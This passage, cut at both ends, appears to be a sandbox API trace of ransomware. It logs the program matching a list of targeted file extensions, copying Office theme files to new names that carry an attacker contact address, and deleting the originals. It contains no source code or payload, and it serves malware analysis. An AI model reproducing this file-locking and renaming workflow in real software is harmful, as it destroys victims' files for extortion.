lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString=".xlsx") returned 5 [0047.216] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.216] lstrlenW (lpString=".ppt") returned 4 [0047.217] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.217] lstrlenW (lpString=".zip") returned 4 [0047.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.217] lstrlenW (lpString=".rar") returned 4 [0047.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.217] lstrlenW (lpString=".bz2") returned 4 [0047.217] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.217] lstrlenW (lpString=".7z") returned 3 [0047.217] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.217] lstrlenW (lpString=".dbf") returned 4 [0047.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.217] lstrlenW (lpString=".1cd") returned 4 [0047.217] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.217] lstrlenW (lpString=".jpg") returned 4 [0047.217] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.217] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.217] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.218] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=21745) returned 1 [0047.218] CloseHandle (hObject=0x20c) returned 1 [0047.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 0x20 [0047.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.218] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.218] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.219] GetLastError () returned 0x0 [0047.219] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x54f1, lpOverlapped=0x0) returned 1 [0047.221] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x5500, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x5500, lpOverlapped=0x0) returned 1 [0047.222] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.222] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.222] SetEndOfFile (hFile=0x1b8) returned 1 [0047.223] CloseHandle (hObject=0x1b8) returned 1 [0047.223] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.223] SetEndOfFile (hFile=0x20c) returned 1 [0047.224] CloseHandle (hObject=0x20c) returned 1 [0047.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.224] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\thmbnail.png")) returned 1 [0047.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.224] lstrlenW (lpString=".doc") returned 4 [0047.224] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.224] lstrlenW (lpString=".docx") returned 5 [0047.224] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.224] lstrlenW (lpString=".pdf") returned 4 [0047.224] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.224] lstrlenW (lpString=".xls") returned 4 [0047.224] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.224] lstrlenW (lpString=".xlsx") returned 5 [0047.224] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.224] lstrlenW (lpString=".ppt") returned 4 [0047.224] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.224] lstrlenW (lpString=".zip") returned 4 [0047.224] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.224] lstrlenW (lpString=".rar") returned 4 [0047.224] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.225] lstrlenW (lpString=".bz2") returned 4 [0047.225] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString=".7z") returned 3 [0047.225] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString=".dbf") returned 4 [0047.225] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString=".1cd") returned 4 [0047.225] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString=".jpg") returned 4 [0047.225] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString=".doc") returned 4 [0047.225] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString=".docx") returned 5 [0047.225] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.225] lstrlenW (lpString=".pdf") returned 4 [0047.225] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.225] lstrlenW (lpString=".xls") returned 4 [0047.225] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.225] lstrlenW (lpString=".xlsx") returned 5 [0047.225] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.225] lstrlenW (lpString=".ppt") returned 4 [0047.225] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.225] lstrlenW (lpString=".zip") returned 4 [0047.225] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.225] lstrlenW (lpString=".rar") returned 4 [0047.225] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.225] lstrlenW (lpString=".bz2") returned 4 [0047.225] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.226] lstrlenW (lpString=".7z") returned 3 [0047.226] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.226] lstrlenW (lpString=".dbf") returned 4 [0047.226] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.226] lstrlenW (lpString=".1cd") returned 4 [0047.226] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.226] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.226] lstrlenW (lpString=".jpg") returned 4 [0047.226] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.226] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.226] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.226] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1339) returned 1 [0047.226] CloseHandle (hObject=0x20c) returned 1 [0047.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20 [0047.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.227] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.227] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.227] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.408] GetLastError () returned 0x0 [0047.408] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x53b, lpOverlapped=0x0) returned 1 [0047.409] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x540, lpOverlapped=0x0) returned 1 [0047.410] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.410] WriteFile (in: hFile=0x178, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.410] SetEndOfFile (hFile=0x178) returned 1 [0047.411] CloseHandle (hObject=0x178) returned 1 [0047.411] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.411] SetEndOfFile (hFile=0x20c) returned 1 [0047.411] CloseHandle (hObject=0x20c) returned 1 [0047.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.412] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1 [0047.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.412] lstrlenW (lpString=".doc") returned 4 [0047.412] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.412] lstrlenW (lpString=".docx") returned 5 [0047.412] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.412] lstrlenW (lpString=".pdf") returned 4 [0047.412] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.412] lstrlenW (lpString=".xls") returned 4 [0047.412] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.412] lstrlenW (lpString=".xlsx") returned 5 [0047.412] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.412] lstrlenW (lpString=".ppt") returned 4 [0047.412] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.412] lstrlenW (lpString=".zip") returned 4 [0047.412] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.412] lstrlenW (lpString=".rar") returned 4 [0047.412] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.412] lstrlenW (lpString=".bz2") returned 4 [0047.412] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.412] lstrlenW (lpString=".7z") returned 3 [0047.412] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".dbf") returned 4 [0047.413] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".1cd") returned 4 [0047.413] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".jpg") returned 4 [0047.413] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".doc") returned 4 [0047.413] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.413] lstrlenW (lpString=".docx") returned 5 [0047.413] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.413] lstrlenW (lpString=".pdf") returned 4 [0047.413] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString=".xls") returned 4 [0047.413] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString=".xlsx") returned 5 [0047.413] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.413] lstrlenW (lpString=".ppt") returned 4 [0047.413] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".zip") returned 4 [0047.413] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString=".rar") returned 4 [0047.413] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.413] lstrlenW (lpString=".bz2") returned 4 [0047.413] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.413] lstrlenW (lpString=".7z") returned 3 [0047.413] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.413] lstrlenW (lpString=".dbf") returned 4 [0047.413] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.414] lstrlenW (lpString=".1cd") returned 4 [0047.414] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0047.414] lstrlenW (lpString=".jpg") returned 4 [0047.414] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.414] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.414] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.414] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=3970) returned 1 [0047.414] CloseHandle (hObject=0x20c) returned 1 [0047.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 0x20 [0047.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.415] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.415] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.504] GetLastError () returned 0x0 [0048.504] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xf82, lpOverlapped=0x0) returned 1 [0048.520] WriteFile (in: hFile=0x220, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf90, lpOverlapped=0x0) returned 1 [0048.522] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.522] WriteFile (in: hFile=0x220, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.522] SetEndOfFile (hFile=0x220) returned 1 [0048.522] CloseHandle (hObject=0x220) returned 1 [0048.522] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.522] SetEndOfFile (hFile=0x20c) returned 1 [0048.523] CloseHandle (hObject=0x20c) returned 1 [0048.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.523] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif")) returned 1 [0048.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.523] lstrlenW (lpString=".doc") returned 4 [0048.523] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.523] lstrlenW (lpString=".docx") returned 5 [0048.523] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.523] lstrlenW (lpString=".pdf") returned 4 [0048.523] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.523] lstrlenW (lpString=".xls") returned 4 [0048.523] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString=".xlsx") returned 5 [0048.524] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.524] lstrlenW (lpString=".ppt") returned 4 [0048.524] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString=".zip") returned 4 [0048.524] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString=".rar") returned 4 [0048.524] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString=".bz2") returned 4 [0048.524] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.524] lstrlenW (lpString=".7z") returned 3 [0048.524] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString=".dbf") returned 4 [0048.524] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString=".1cd") returned 4 [0048.524] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString=".jpg") returned 4 [0048.524] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.524] lstrlenW (lpString=".doc") returned 4 [0048.524] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.524] lstrlenW (lpString=".docx") returned 5 [0048.524] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.524] lstrlenW (lpString=".pdf") returned 4 [0048.524] lstrcmpiW (lpString1=".pdf", 